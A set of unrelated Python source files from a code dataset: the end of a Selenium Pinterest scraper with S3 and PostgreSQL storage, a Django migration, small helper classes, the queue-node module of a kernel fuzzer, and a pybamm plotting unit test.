page layout and adds it to the key "image_src" in self._current_dict.
Arguments
---------
None
Returns
---------
None '''
try:
try:
try:
# Waits until the image container element is present; fails the try statement if it isn't present.
image_container = WebDriverWait(self._driver, 1).until(
EC.presence_of_element_located((By.XPATH, self._xpath_dict['story_pin_image']))
)
# Grabs the src for the image if the correct container was obtained.
image = image_container.get_attribute('style')
if not image:
# If the container didn't have the style attribute then it should have the poster attribute, i.e. a video page.
# Grabs the src for the thumbnail of the video on the page.
self._current_dict["is_image_or_video"] = 'video(story page format)'
video_container = self._driver.find_element_by_xpath(self._xpath_dict['story_pin_video'])
self._current_dict["image_src"] = video_container.get_attribute('poster')
# Downloads the image if the user wants to download images for this category.
self._download_image(self._current_dict["image_src"])
# Checks if the image has been downloaded and updates the current page dict to record it.
self._is_img_downloaded()
# Appends the save location of the image to the current page dict.
self._save_location_key()
else:
# If the style attribute is found then an image is present on the page.
self._current_dict["is_image_or_video"] = 'image(story page format)'
# The style attribute embeds the src inside a url("...") declaration, so split on the quotes to isolate the src.
self._current_dict["image_src"] = re.split('\"', image)[1]
# Downloads the image if the user wants to download images for this category.
self._download_image(self._current_dict["image_src"])
# Checks if the image has been downloaded and updates the current page dict to record it.
self._is_img_downloaded()
# Appends the save location of the image to the current page dict.
self._save_location_key()
except:
# If the element at the start of the function does not load there is a different page format.
# Grabs and appends the src for the first thumbnail of the videos on the page to the current dict.
self._current_dict["is_image_or_video"] = 'multi-video(story page format)'
video_container = self._driver.find_element_by_xpath(self._xpath_dict['story_pin_multi_video'])
self._current_dict["image_src"] = video_container.get_attribute('poster')
# Downloads the image if the user wants to download images for this category.
self._download_image(self._current_dict["image_src"])
# Checks if the image has been downloaded and updates the current page dict to record it.
self._is_img_downloaded()
# Appends the save location of the image to the current page dict.
self._save_location_key()
except:
# If none of the above elements are present, the page has a layout that has not been encountered yet.
# If the src has been grabbed but there was an error elsewhere, keep the src. If not, upload an error message.
try:
if self._current_dict['image_src']:
pass
except:
self._current_dict['image_src'] = 'Image src error.'
# Appends that the image has not been downloaded
self._current_dict['downloaded'] = False
# Appends the save location of the image to the current page dict.
self._save_location_key()
print('\nStory image grab error.')
except KeyboardInterrupt:
raise KeyboardInterrupt
def _grab_all_users_and_counts(self) -> None:
''' Defines a function that checks if a user is officially recognised or a story. Then runs the appropriate
methods to grab the data based on what type of page layout is present on the page.
Arguments
---------
None
Returns
---------
None '''
try:
# Sees if the page has the layout of an official user account.
if (self._driver.find_elements_by_xpath(self._xpath_dict['official_user_container'])):
# Generates a unique id for the current page dict.
self._generate_unique_id()
# Grabs the title of the page.
self._grab_title(self._xpath_dict['reg_title_element'])
# Grabs the description of the page.
self._grab_description(self._xpath_dict['desc_container'], self._xpath_dict['desc_element'])
# Grabs the user account name and the follower count of the page.
self._grab_user_and_count(
self._xpath_dict['official_user_container'],
self._xpath_dict['official_user_element']
)
# Grabs the tags present on the page.
self._grab_tags(self._xpath_dict['tag_container'])
# Grabs the image src and downloads the image of the page if applicable.
self._grab_image_src()
# Sees if the page has the layout of a non official user account.
elif (self._driver.find_elements_by_xpath(self._xpath_dict['close_up_details'])):
# Generates a unique id for the current page dict.
self._generate_unique_id()
# Grabs the title of the page.
self._grab_title(self._xpath_dict['reg_title_element'])
# Grabs the description of the page.
self._grab_description(self._xpath_dict['desc_container'], self._xpath_dict['desc_element'])
# Grabs the user account name and the follower count of the page.
self._grab_user_and_count(
self._xpath_dict['non_off_user_container'],
self._xpath_dict['non_off_user_element']
)
# Grabs the tags present on the page.
self._grab_tags(self._xpath_dict['tag_container'])
# Grabs the image src and downloads the image of the page if applicable.
self._grab_image_src()
# If none of the layouts above are present the page layout is likely that of a story post.
else:
# Generates a unique id for the current page dict.
self._generate_unique_id()
# Grabs the title of the page.
self._grab_title(self._xpath_dict['h1_title_element'])
# As far as it is possible to tell there are no descriptions available for the story post layout.
self._current_dict["description"] = 'No description available Story format'
# Grabs the user account name and the follower count of the page.
self._grab_user_and_count(
self._xpath_dict['non_off_user_container'],
self._xpath_dict['non_off_user_element']
)
# Grabs the tags present on the page.
self._grab_tags(self._xpath_dict['story_tag_container'])
# Grabs the first image src and downloads the image of the page if applicable.
self._grab_story_image_srcs()
except KeyboardInterrupt:
raise KeyboardInterrupt
def _grab_page_data(self) -> None:
''' Defines a function which combines all data grab methods and loops through all page links
to grab the data from each page.
Arguments
---------
None
Returns
---------
None '''
try:
# Link set has hrefs appended during the run of the program, log defines the previously visited pages.
# Only go to the pages that are in the current run set and not in the log.
fresh_set = self._link_set.difference(self._log)
for (cat, link) in tqdm(list(fresh_set)):
# Grab only the name of the category to which the href belongs.
self._category = cat.split("/")[0]
# For every page we pass in a particular category increase the counter dictionary count of the category by 1.
self._counter_dict[f"{self._category}"] += 1
# Renew the current_dictionary for every page we visit.
self._current_dict = {}
# Go to the page for which we have the href.
self._driver.get(link)
# Grab all page data and download the image if applicable.
self._grab_all_users_and_counts()
# Append the current page dictionary to the main dictionary as a value to the key (category_(number of page in category list)).
self._main_dict[f"{self._category}"][f"{self._category}_{self._counter_dict[self._category]}"] = self._current_dict
except KeyboardInterrupt:
raise KeyboardInterrupt
def _data_dump(self, selected_category_names: list) -> None:
''' Defines a function which dumps the compiled dictionary for each category to its respective folder to be saved
as a json file.
Arguments
---------
selected_category_names: list (A list of all categories selected by the user for the current run.)
Returns
---------
None '''
try:
# If the data folder doesn't exist, create it and change directory to said data folder.
if not os.path.exists('../data'):
os.mkdir('../data')
os.chdir('..')
os.chdir('data')
print('Dumping Data: ')
# Dump the full dictionary for each category as a json file to its folder.
for name in tqdm(selected_category_names):
with open(f'temp_{name}/{name}.json', 'w') as loading:
json.dump(self._main_dict[f"{name}"], loading)
except KeyboardInterrupt:
raise KeyboardInterrupt
def _data_transferal(self, selected_category_names: list) -> None:
''' Defines a function which moves data from temp folders to its final destination. Data is handled
in this way to avoid errors when a KeyboardInterrupt stops the scraping process.
Arguments
---------
selected_category_names: list (A list of all categories selected by the user for the current run.)
Returns
---------
None '''
try:
print('Moving files around a bit... ')
for category in tqdm(selected_category_names):
# Define the path for the file containing run data for the current category.
temp_path = f'../data/temp_{category}'
# If data is to be saved locally.
if category not in self._s3_list:
# Define the path which data will be stored in.
end_path = f'../data/{category}'
# If this is the first run, or old data has been deleted via the user's input.
if not os.path.exists(end_path):
# Simply rename the temp folder to the name of the final folder.
os.rename(temp_path, end_path)
# If the end folder already exists from a previous run.
else:
# For every file in the temp folder, move it to the correct folder and delete the temp folder.
for file in os.listdir(temp_path):
shutil.move(f'{temp_path}/{file}', f'{end_path}/{file}')
shutil.rmtree(temp_path)
# If the data is to be stored remotely.
else:
# Define the path to save in the s3 bucket.
end_path = f'pinterest/{category}'
# For every file in the temp folder, move it to the correct place in the s3 bucket then delete the temp folder.
for file in os.listdir(temp_path):
self._s3_client.upload_file(
f'{temp_path}/{file}',
self.s3_bucket,
f'{end_path}/{file}'
)
shutil.rmtree(temp_path)
except KeyboardInterrupt:
raise KeyboardInterrupt
def _create_log(self, selected_category_names: list) -> bool:
''' Defines a function which creates two logs. One logs the pages visited so they are not repeated;
the other records where the most recent save for each category is, so that subsequent runs of the
script can update the most recent save.
Arguments
---------
selected_category_names: list (A list of all categories selected by the user for the current run.)
Returns
---------
bool (Returns whether the 2 logs have been successfully created, for testing purposes.) '''
try:
# if dict exists json.load
print('Creating save logs: ')
# If a save_log already exists, load the log into a variable in order to append to it before resaving.
if os.path.exists('../data/recent-save-log.json'):
with open('../data/recent-save-log.json', 'r') as load:
self.recent_save_dict = json.load(load)
# If the save_log does not already exist, initialise an empty dictionary to store the data for the log.
else:
self.recent_save_dict = {}
# For each category, check if the images should be saved remotely or locally.
for category in tqdm(selected_category_names):
# If saving remotely, append the name of the destination bucket to the save_log.
if category in self._s3_list:
update = ['remote', self.s3_bucket]
# Else just say that the data was saved locally.
else:
update = 'local'
# Append the save location to the dictionary for each category being saved.
self.recent_save_dict[category] = update
# Open a context manager for both logs and dump the data to the appropriate json file.
with open('../data/log.json', 'w') as log, open('../data/recent-save-log.json', 'w') \
as save:
json.dump(list(self._link_set), log)
json.dump(self.recent_save_dict, save)
return os.path.exists('../data/log.json') and os.path.exists('../data/recent-save-log.json')
except KeyboardInterrupt:
raise KeyboardInterrupt
def _delete_old_files(self, fresh: str, selected_category_names: list) -> None:
''' Defines a function that deletes old save files if they become outdated.
Arguments
---------
fresh: Union[str, None] ('Y' or 'N' if previous save data is detected and the user chooses so. \
None if no data relates to current run.) \n
selected_category_names: list (A list of all categories selected by the user for the current run.)
Returns
---------
None '''
try:
# If previous save data has been detected by the script.
if fresh:
# Loads the save file.
with open('../data/recent-save-log.json', 'r') as load:
old_saves = json.load(load)
# Grabs the save categories relating to the current run.
saves = [key for key in old_saves if key in selected_category_names]
# For every category that relates to the current run.
for save in saves:
# If the new data is to be saved remotely to the same remote bucket as the previous save data.
if save in self._s3_list and old_saves[save][0] == 'remote' \
and old_saves[save][1] == self.s3_bucket:
# If the user wants to delete old data, remove all old data from the S3 bucket.
if fresh == 'N':
s3 = boto3.resource('s3')
bucket = s3.Bucket(old_saves[save][1])
bucket.objects.filter(Prefix=f"pinterest/{save}/").delete()
# If the new data is to be saved remotely but to a different bucket than the previous save.
elif save in self._s3_list and old_saves[save][0] == 'remote' \
and old_saves[save][1] != self.s3_bucket:
# Get the data from the previous bucket.
s3 = boto3.resource('s3')
src_bucket = s3.Bucket(old_saves[save][1])
target_bucket = s3.Bucket(self.s3_bucket)
print('Relocating previous bucket save files. ')
# For every item in the older bucket.
for src in tqdm(src_bucket.objects.filter(Prefix=f"pinterest/{save}/")):
# If continuing from old data, move old data to new bucket and delete data from old bucket.
if fresh == 'Y':
copy_source = {
'Bucket': src_bucket.name,
'Key': src.key
}
target_bucket.copy(copy_source, src.key)
src.delete()
# If not continuing from old save data, delete old data.
elif fresh == 'N':
src.delete()
# If data to be saved locally but previous save was remote.
elif save not in self._s3_list and old_saves[save][0] == 'remote':
# Grab all data from old bucket.
s3 = boto3.resource('s3')
src_bucket = s3.Bucket(old_saves[save][1])
print('Relocating previous bucket save files. ')
# For every item in old bucket.
for src in tqdm(src_bucket.objects.filter(Prefix=
f"pinterest/{save}/")):
# If continuing from old data, download remote data to correct local folder, delete data from bucket.
if fresh == 'Y':
src_bucket.download_file(src.key,
f"../data/temp_{save}/{src.key.split('/')[2]}")
src.delete()
# If not continuing from old data, delete data from old bucket.
elif fresh == 'N':
src.delete()
# If new data to be saved locally and old data is also local. Pass unless not continuing from old data.
elif save not in self._s3_list and old_saves[save] == 'local':
# If not continuing from old data, delete old data.
if fresh == 'N':
shutil.rmtree(f'../data/{save}')
# If new data to be saved remotely and old data is local.
elif save in self._s3_list and old_saves[save] == 'local':
# Grab the remote bucket.
s3 = boto3.resource('s3')
print('Relocating previous local save files. ')
# For every item in old local folder.
for item in tqdm(os.listdir(f'../data/{save}')):
# If continuing from old data, upload previous data to designated bucket and delete data from local
if fresh == 'Y':
self._s3_client.upload_file(f'../data/{save}/{item}',
self.s3_bucket, f'pinterest/{save}/{item}')
# If not continuing from old data, delete old data.
elif fresh == 'N':
pass
shutil.rmtree(f'../data/{save}')
else:
# If there is a mistake in the above code and something goes wrong, abort the script to preserve the integrity of the old data.
print('Missed a scenario in _delete_old_files. ')
self._driver.quit()
except KeyboardInterrupt:
raise KeyboardInterrupt
def _connect_to_RDS(self, remote: bool) -> Engine:
''' Defines a function which collects the connection information to an RDS in order to connect
to said RDS.
Arguments
---------
remote: bool (A boolean to determine whether to connect to a remote (AWS) RDS or to a local database.)
Returns
---------
engine: Engine (The RDS engine to connect to the RDS and issue commands.) '''
DATABASE_TYPE = 'postgresql'
DBAPI = 'psycopg2'
# Ask for user information from script user. If none given default to postgres.
USER = self._argsv[13]
if not USER:
USER = 'postgres'
# Asks the user for a connection password.
PASSWORD = self._argsv[14]
# Asks the user for the connection port, if none given, default to 5433.
PORT = self._argsv[15]
if not PORT:
PORT = 5433
# Asks the user for the database name, if none given, default to Pagila.
DATABASE = self._argsv[16]
if not DATABASE:
DATABASE = 'Pagila'
# If the user wants to make a remote RDS, change the engine being created to support AWS RDS.
if remote:
ENDPOINT = self._argsv[17]
engine = create_engine(f"{DATABASE_TYPE}+{DBAPI}://{USER}:{PASSWORD}@{ENDPOINT}:{PORT}/{DATABASE}")
else:
# Asks the user for the host, if none given, default to localhost.
HOST = self._argsv[18]
if not HOST:
HOST = 'localhost'
engine = create_engine(f"{DATABASE_TYPE}+{DBAPI}://{USER}:{PASSWORD}@{HOST}:{PORT}/{DATABASE}")
# Connect to the RDS
engine.connect()
return engine
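# Illustrative note (placeholder values, not real credentials): with the defaults above a local run
# builds an engine URL of the form 'postgresql+psycopg2://postgres:<password>@localhost:5433/Pagila',
# while a remote run swaps the host for the supplied AWS RDS endpoint.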
def _process_df(self, df) -> DataFrame:
''' Defines a function which rearranges the dataframe into the proper format before sending to the RDS.
Arguments
---------
df: dataframe (pandas dataframe to reformat.)
Returns
---------
df: dataframe (The pandas dataframe in the correct format to send to the RDS.) '''
# Transpose the dataframe.
df = df.T
df['name'] = df.index
# Make unique_id the index of the dataframe.
df = df.set_index('unique_id')
file_name_col = df.pop('name')
df.insert(0, 'name', file_name_col)
print(df.head(3))
return df
def _json_to_rds(self, data_path: str, remote: bool) -> None:
''' Defines a function which loads the json files from both remote and local folders and loads
the data into the RDS.
Arguments
---------
data_path: str (The local path where json files are stored.) \n
remote: bool (A boolean to determine whether to connect to a remote (AWS) RDS or to a local database.)
Returns
---------
None '''
# Connect to RDS.
engine = self._connect_to_RDS(remote)
# Find all local JSON files.
folders = os.listdir(data_path)
recent_log = folders[folders.index('recent-save-log.json')]
with open(data_path + '/' + recent_log) as log_file:
recent_saves = json.load(log_file)
# Check the content of the log to see whether the data is on S3 or on the local PC.
for key, val in recent_saves.items():
# For local JSON files.
if type(val) == str:
json_path = data_path + '/' + key + '/' + key +'.json'
print(json_path)
# Load local JSON file as a dataframe.
df = pd.read_json(json_path)
df = self._process_df(df)
df.to_sql(f'pinterest_{key}', engine, if_exists='replace')
# For remote JSON files.
elif type(val) == list:
# Load file from S3 bucket.
json_obj = self._s3_client.get_object(
Bucket=val[1],
Key=f'pinterest/{key}/{key}.json'
)
save_dict = json.loads(json_obj['Body'].read())
# Load as a dataframe.
df = pd.DataFrame.from_dict(save_dict)
df = self._process_df(df)
df.to_sql(f'pinterest_{key}', engine, if_exists='replace')
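# Note: each category is written to its own table, e.g. a hypothetical 'cats' category would land in
# 'pinterest_cats', and if_exists='replace' means the table is rebuilt from scratch on every run.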
def get_category_data(self) -> None:
''' Defines a public function which combines all of the previously defined methods in order to scrape
the Pinterest pages as the user specifies.
Arguments
---------
None
Returns
---------
None '''
# External try loop for KeyboardInterrupt robustness.
try:
# Get the categories on the root page.
category_link_dict = self._get_category_links(self._xpath_dict['categories_container'])
sleep(0.75)
# Display categories as options to the user.
self._print_options(category_link_dict)
# Asks the user what categories they would like to scrape.
selected_category_names, selected_category = self._get_user_input(category_link_dict)
# Asks the user what categories they would like to download images for.
self._categories_to_save_imgs(selected_category_names)
# Asks the user if they would like to save any data to the cloud.
self._save_to_cloud_or_local(selected_category_names)
# Initialises counter dict and temp save folders.
self._initialise_counter(selected_category_names)
self._initialise_local_folders('../data', selected_category_names)
# Searches for previous save data.
fresh = self._check_for_logs(selected_category_names)
# Asks the user how many times they would like to scroll through each category page.
while True:
try:
scrolling_times = int(self._argsv[10])
break
except KeyboardInterrupt:
raise KeyboardInterrupt
except:
print('Invalid input, try again: ')
# Grabs the hrefs for the images/data to be grabbed.
self._grab_images_src(selected_category, n_scrolls=scrolling_times)
# Grabs data for every href saved.
self._grab_page_data()
# Deletes redundant data.
self._delete_old_files(fresh, selected_category_names)
# Saves data dictionaries as JSON files.
self._data_dump(selected_category_names)
print('Please do not end the script now. May cause errors with later runs. ')
# Moves data from temp save folders to final destination.
self._data_transferal(selected_category_names)
# Creates logs of the data collection for subsequent runs.
log_created = self._create_log(selected_category_names)
self._driver.quit()
# If there is a keyboard interrupt, preserve old save integrity and delete any new run data.
except KeyboardInterrupt:
print('\nTerminating Script.\nRemoving any accumulated data. ')
try:
if selected_category_names:
for category in tqdm(selected_category_names):
if os.path.exists(f'../data/temp_{category}'):
shutil.rmtree(f'../data/temp_{category}')
finally:
exit()
if __name__ == "__main__":
# Initiate the scraper.
pinterest_scraper = PinterestScraper('https://www.pinterest.co.uk/ideas/')
# Run the scraper.
pinterest_scraper.get_category_data()
# Create RDS from collected data.
pinterest_scraper.create_RDS()
|
StarcoderdataPython
|
3369746
|
<reponame>dmm34/voteapp
# -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-03-08 16:11
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('voteapp', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Voter',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(max_length=30)),
('last_name', models.CharField(max_length=30)),
('voter_id', models.CharField(max_length=30)),
],
),
migrations.AddField(
model_name='question',
name='type',
field=models.CharField(default=None, max_length=200),
),
]
|
StarcoderdataPython
|
1604385
|
from abc import ABCMeta, abstractmethod
class Action:
__metaclass__ = ABCMeta
def __init__(self, scraper):
self._scraper = scraper
self._web_driver = scraper.web_driver
@abstractmethod
def do(self): raise NotImplementedError
@abstractmethod
def on_fail(self): raise NotImplementedError
|
StarcoderdataPython
|
4837975
|
<gh_stars>0
import json
import os
from data_import.profile_information import ProfileInfo
from data_import.api import WebImporter
def download_activities_from_api(
profile: ProfileInfo,
save_path: str,
file_name: str = 'activities'
):
# download activities
importer = WebImporter(profile.client_id, profile.client_secret, profile.refresh_token)
activities = importer.get_activities()
serialized_activities = [activity.to_dict() for activity in activities]
# save to json
os.makedirs(save_path, exist_ok=True)
filename = file_name + '.json'
with open(os.path.join(save_path, filename), 'w') as fout:
json.dump(serialized_activities, fout, ensure_ascii=False, indent=4)
|
StarcoderdataPython
|
3323791
|
<reponame>SafeBreach-Labs/hAFL2<gh_stars>100-1000
# Copyright 2017-2019 <NAME>, <NAME>, <NAME>
# Copyright 2019-2020 Intel Corporation
#
# SPDX-License-Identifier: AGPL-3.0-or-later
"""
Fuzz inputs are managed as nodes in a queue. Any persistent metadata is stored here as node attributes.
"""
import lz4.frame
import mmh3
import msgpack
from common.config import FuzzerConfiguration
from common.util import read_binary_file, atomic_write
class QueueNode:
NextID = 1
def __init__(self, payload, bitmap, node_struct, write=True):
self.node_struct = node_struct
self.busy = False
self.set_id(QueueNode.NextID, write=False)
QueueNode.NextID += 1
self.set_payload(payload, write=write)
# store individual bitmaps only in debug mode
if bitmap and FuzzerConfiguration().argument_values['v']:
self.write_bitmap(bitmap)
@staticmethod
def get_metadata(id):
return msgpack.unpackb(read_binary_file(QueueNode.__get_metadata_filename(id)), raw=False, strict_map_key=False)
@staticmethod
def get_payload(exitreason, id):
return read_binary_file(QueueNode.__get_payload_filename(exitreason, id))
def __get_bitmap_filename(self):
workdir = FuzzerConfiguration().argument_values['work_dir']
filename = "/bitmaps/payload_%05d.lz4" % (self.get_id())
return workdir + filename
@staticmethod
def __get_payload_filename(exit_reason, id):
workdir = FuzzerConfiguration().argument_values['work_dir']
filename = "/corpus/%s/payload_%05d" % (exit_reason, id)
return workdir + filename
@staticmethod
def __get_metadata_filename(id):
workdir = FuzzerConfiguration().argument_values['work_dir']
return workdir + "/metadata/node_%05d" % id
def update_file(self, write=True):
if write:
self.write_metadata()
self.dirty = False
else:
self.dirty = True
def write_bitmap(self, bitmap):
atomic_write(self.__get_bitmap_filename(), lz4.frame.compress(bitmap))
def write_metadata(self):
return atomic_write(QueueNode.__get_metadata_filename(self.get_id()), msgpack.packb(self.node_struct, use_bin_type=True))
def load_metadata(self):
QueueNode.get_metadata(self.id)
@staticmethod
# will be used both for the final update and the intermediate update in the statelogic. Needs to work in both occasions!
# That means it needs to be able to apply an update to another update as well as the final meta data
# This function must leave new_data unchanged, but may change old_data
def apply_metadata_update(old_data, new_data):
new_data = new_data.copy() # if we remove keys deeper than attention_execs and attention_secs, we need a deep copy
old_data["attention_execs"] = old_data.get("attention_execs", 0) + new_data["attention_execs"]
old_data["attention_secs"] = old_data.get("attention_secs", 0) + new_data["attention_secs"]
for key in ["state_time_initial", "state_time_havoc", "state_time_grimoire", "state_time_grimoire_inference",
"state_time_redqueen"]:
old_data[key] = old_data.get(key, 0) + new_data[key]
del new_data[key]
del new_data["attention_execs"]
del new_data["attention_secs"]
old_data.update(new_data)
return old_data
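# Rough illustration (made-up values): merging new_data {'attention_execs': 5, 'attention_secs': 1.0, ...}
# into old_data {'attention_execs': 10, 'attention_secs': 2.0, ...} accumulates the counters to 15 and 3.0,
# while any keys left in new_data after the deletions simply overwrite the corresponding keys in old_data.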
def update_metadata(self, delta, write=True):
self.node_struct = QueueNode.apply_metadata_update(self.node_struct, delta)
self.update_file(write=True)
def set_payload(self, payload, write=True):
self.set_payload_len(len(payload), write=False)
atomic_write(QueueNode.__get_payload_filename(self.get_exit_reason(), self.get_id()), payload)
def get_payload_len(self):
return self.node_struct["payload_len"]
def set_payload_len(self, val, write=True):
self.node_struct["payload_len"] = val
self.update_file(write)
def get_id(self):
return self.node_struct["id"]
def set_id(self, val, write=True):
self.node_struct["id"] = val
self.update_file(write)
def get_new_bytes(self):
return self.node_struct["new_bytes"]
def set_new_bytes(self, val, write=True):
self.node_struct["new_bytes"] = val
self.update_file(write)
def get_new_bits(self):
return self.node_struct["new_bits"]
def clear_fav_bits(self, write=True):
self.node_struct["fav_bits"] = {}
self.update_file(write)
def get_fav_bits(self):
return self.node_struct["fav_bits"]
def add_fav_bit(self, index, write=True):
self.node_struct["fav_bits"][index] = 0
self.update_file(write)
def remove_fav_bit(self, index, write=True):
assert index in self.node_struct["fav_bits"]
self.node_struct["fav_bits"].pop(index)
self.update_file(write)
def set_new_bits(self, val, write=True):
self.node_struct["new_bits"] = val
self.update_file(write)
def get_level(self):
return self.node_struct["level"]
def set_level(self, val, write=True):
self.node_struct["level"] = val
self.update_file(write)
def is_favorite(self):
return len(self.node_struct["fav_bits"]) > 0
def get_parent_id(self):
return self.node_struct["info"]["parent"]
def get_initial_performance(self):
return self.node_struct["info"]["performance"]
def get_performance(self):
return self.node_struct["performance"]
def set_performance(self, val, write=True):
self.node_struct["performance"] = val
self.update_file(write)
def get_state(self):
return self.node_struct["state"]["name"]
def set_state(self, val, write=True):
self.node_struct["state"]["name"] = val
self.update_file(write)
def get_exit_reason(self):
return self.node_struct["info"]["exit_reason"]
def set_exit_reason(self, val, write=True):
self.node_struct["info"]["exit_reason"] = val
self.update_file(write)
def get_fav_factor(self):
return self.node_struct["fav_factor"]
def set_score(self, val):
self.node_struct["score"] = val
def get_score(self):
return self.node_struct["score"]
def set_fav_factor(self, val, write=True):
self.node_struct["fav_factor"] = val
self.update_file(write)
def set_free(self):
self.busy = False
def set_busy(self):
self.busy = True
def is_busy(self):
return self.busy
|
StarcoderdataPython
|
3217874
|
import pybamm
import unittest
import numpy as np
class TestQuickPlot(unittest.TestCase):
def test_simple_ode_model(self):
model = pybamm.lithium_ion.BaseModel(name="Simple ODE Model")
whole_cell = ["negative electrode", "separator", "positive electrode"]
# Create variables: domain is explicitly empty since these variables are only
# functions of time
a = pybamm.Variable("a", domain=[])
b = pybamm.Variable("b", domain=[])
c = pybamm.Variable("c", domain=[])
# Simple ODEs
model.rhs = {a: pybamm.Scalar(2), b: pybamm.Scalar(0), c: -c}
# Simple initial conditions
model.initial_conditions = {
a: pybamm.Scalar(0),
b: pybamm.Scalar(1),
c: pybamm.Scalar(1),
}
# no boundary conditions for an ODE model
# Broadcast some of the variables
model.variables = {
"a": a,
"b broadcasted": pybamm.FullBroadcast(b, whole_cell, "current collector"),
"c broadcasted": pybamm.FullBroadcast(
c, ["negative electrode", "separator"], "current collector"
),
"b broadcasted negative electrode": pybamm.PrimaryBroadcast(
b, "negative particle"
),
"c broadcasted positive electrode": pybamm.PrimaryBroadcast(
c, "positive particle"
),
}
model.timescale = pybamm.Scalar(1)
# ODEs only (don't use jacobian)
model.use_jacobian = False
# Process and solve
geometry = model.default_geometry
param = model.default_parameter_values
param.process_model(model)
param.process_geometry(geometry)
mesh = pybamm.Mesh(geometry, model.default_submesh_types, model.default_var_pts)
disc = pybamm.Discretisation(mesh, model.default_spatial_methods)
disc.process_model(model)
solver = model.default_solver
t_eval = np.linspace(0, 2, 100)
solution = solver.solve(model, t_eval)
quick_plot = pybamm.QuickPlot(
solution,
[
"a",
"b broadcasted",
"c broadcasted",
"b broadcasted negative electrode",
"c broadcasted positive electrode",
],
)
quick_plot.plot(0)
# update the axis
new_axis = [0, 0.5, 0, 1]
quick_plot.axis_limits.update({("a",): new_axis})
self.assertEqual(quick_plot.axis_limits[("a",)], new_axis)
# and now reset them
quick_plot.reset_axis()
self.assertNotEqual(quick_plot.axis_limits[("a",)], new_axis)
# check dynamic plot loads
quick_plot.dynamic_plot(testing=True)
quick_plot.slider_update(0.01)
# Test with different output variables
quick_plot = pybamm.QuickPlot(solution, ["b broadcasted"])
self.assertEqual(len(quick_plot.axis_limits), 1)
quick_plot.plot(0)
quick_plot = pybamm.QuickPlot(
solution,
[
["a", "a"],
["b broadcasted", "b broadcasted"],
"c broadcasted",
"b broadcasted negative electrode",
"c broadcasted positive electrode",
],
)
self.assertEqual(len(quick_plot.axis_limits), 5)
quick_plot.plot(0)
# update the axis
new_axis = [0, 0.5, 0, 1]
var_key = ("c broadcasted",)
quick_plot.axis_limits.update({var_key: new_axis})
self.assertEqual(quick_plot.axis_limits[var_key], new_axis)
# and now reset them
quick_plot.reset_axis()
self.assertNotEqual(quick_plot.axis_limits[var_key], new_axis)
# check dynamic plot loads
quick_plot.dynamic_plot(testing=True)
quick_plot.slider_update(0.01)
# Test longer name
model.variables["Variable with a very long name"] = model.variables["a"]
quick_plot = pybamm.QuickPlot(solution, ["Variable with a very long name"])
quick_plot.plot(0)
# Test different inputs
quick_plot = pybamm.QuickPlot(
[solution, solution],
["a"],
colors=["r", "g", "b"],
linestyles=["-", "--"],
figsize=(1, 2),
labels=["sol 1", "sol 2"],
)
self.assertEqual(quick_plot.colors, ["r", "g", "b"])
self.assertEqual(quick_plot.linestyles, ["-", "--"])
self.assertEqual(quick_plot.figsize, (1, 2))
self.assertEqual(quick_plot.labels, ["sol 1", "sol 2"])
# Test different time units
quick_plot = pybamm.QuickPlot(solution, ["a"])
self.assertEqual(quick_plot.time_scaling_factor, 1)
quick_plot = pybamm.QuickPlot(solution, ["a"], time_unit="seconds")
quick_plot.plot(0)
self.assertEqual(quick_plot.time_scaling_factor, 1)
np.testing.assert_array_almost_equal(
quick_plot.plots[("a",)][0][0].get_xdata(), t_eval
)
np.testing.assert_array_almost_equal(
quick_plot.plots[("a",)][0][0].get_ydata(), 2 * t_eval
)
quick_plot = pybamm.QuickPlot(solution, ["a"], time_unit="minutes")
quick_plot.plot(0)
self.assertEqual(quick_plot.time_scaling_factor, 60)
np.testing.assert_array_almost_equal(
quick_plot.plots[("a",)][0][0].get_xdata(), t_eval / 60
)
np.testing.assert_array_almost_equal(
quick_plot.plots[("a",)][0][0].get_ydata(), 2 * t_eval
)
quick_plot = pybamm.QuickPlot(solution, ["a"], time_unit="hours")
quick_plot.plot(0)
self.assertEqual(quick_plot.time_scaling_factor, 3600)
np.testing.assert_array_almost_equal(
quick_plot.plots[("a",)][0][0].get_xdata(), t_eval / 3600
)
np.testing.assert_array_almost_equal(
quick_plot.plots[("a",)][0][0].get_ydata(), 2 * t_eval
)
with self.assertRaisesRegex(ValueError, "time unit"):
pybamm.QuickPlot(solution, ["a"], time_unit="bad unit")
# long solution defaults to hours instead of seconds
solution_long = solver.solve(model, np.linspace(0, 1e5))
quick_plot = pybamm.QuickPlot(solution_long, ["a"])
self.assertEqual(quick_plot.time_scaling_factor, 3600)
# Test different spatial units
quick_plot = pybamm.QuickPlot(solution, ["a"])
self.assertEqual(quick_plot.spatial_unit, "$\mu m$")
quick_plot = pybamm.QuickPlot(solution, ["a"], spatial_unit="m")
self.assertEqual(quick_plot.spatial_unit, "m")
quick_plot = pybamm.QuickPlot(solution, ["a"], spatial_unit="mm")
self.assertEqual(quick_plot.spatial_unit, "mm")
quick_plot = pybamm.QuickPlot(solution, ["a"], spatial_unit="um")
self.assertEqual(quick_plot.spatial_unit, "$\mu m$")
with self.assertRaisesRegex(ValueError, "spatial unit"):
pybamm.QuickPlot(solution, ["a"], spatial_unit="bad unit")
# Test 2D variables
model.variables["2D variable"] = disc.process_symbol(
pybamm.FullBroadcast(
1, "negative particle", {"secondary": "negative electrode"}
)
)
quick_plot = pybamm.QuickPlot(solution, ["2D variable"])
quick_plot.plot(0)
quick_plot.dynamic_plot(testing=True)
quick_plot.slider_update(0.01)
with self.assertRaisesRegex(NotImplementedError, "Cannot plot 2D variables"):
pybamm.QuickPlot([solution, solution], ["2D variable"])
# Test different variable limits
quick_plot = pybamm.QuickPlot(
solution, ["a", ["c broadcasted", "c broadcasted"]], variable_limits="tight"
)
self.assertEqual(quick_plot.axis_limits[("a",)][2:], [None, None])
self.assertEqual(
quick_plot.axis_limits[("c broadcasted", "c broadcasted")][2:], [None, None]
)
quick_plot.plot(0)
quick_plot.slider_update(1)
quick_plot = pybamm.QuickPlot(
solution, ["2D variable"], variable_limits="tight"
)
self.assertEqual(quick_plot.variable_limits[("2D variable",)], (None, None))
quick_plot.plot(0)
quick_plot.slider_update(1)
quick_plot = pybamm.QuickPlot(
solution,
["a", ["c broadcasted", "c broadcasted"]],
variable_limits={"a": [1, 2], ("c broadcasted", "c broadcasted"): [3, 4]},
)
